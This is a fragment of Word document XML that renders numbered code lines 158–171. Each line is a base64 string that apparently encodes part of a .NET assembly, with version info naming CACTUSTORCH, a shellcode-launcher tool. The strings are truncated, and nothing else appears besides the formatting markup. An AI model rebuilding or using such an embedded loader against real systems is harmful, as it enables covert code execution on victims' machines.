          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEOD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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>B"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>158</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDV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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>T"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>159</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>161</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>162</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>163</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>164</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>QA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>165</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>F8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>166</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>167</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAa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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>QB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>169</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>170</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>QA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>171</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
